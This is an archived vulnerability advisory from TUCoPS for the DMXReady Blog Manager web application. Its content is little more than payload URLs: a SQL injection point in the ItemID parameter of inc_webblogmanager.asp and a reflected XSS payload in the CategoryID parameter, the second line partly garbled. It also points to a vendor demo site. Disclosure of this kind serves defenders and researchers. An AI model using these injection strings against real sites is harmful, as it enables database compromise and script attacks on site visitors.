TUCoPS :: Web :: Blogs :: va2350.htm

DMXReady Blog Manager (SQL/XSS)
DMXReady Blog Manager (SQL/XSS)
DMXReady Blog Manager (SQL/XSS)


#########################################################
---------------------------------------------------------
Portal Name: DMXReady Blog Manager (SQL/XSS)
Vendor : http://www.galaxyscripts.com 
Author : Pouya_Server , Pouya.s3rver@Gmail.com 
Aria-Security.Net
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view 
----------

[XSS]:
alert(1369)%3B&ItemID=1&action=refer">http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=>">alert(1369)%3B&ItemID=1&action=refer 
---------------------------------
Demo:
http://www.demo.dmxready.com/applications/WebBlogManager/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH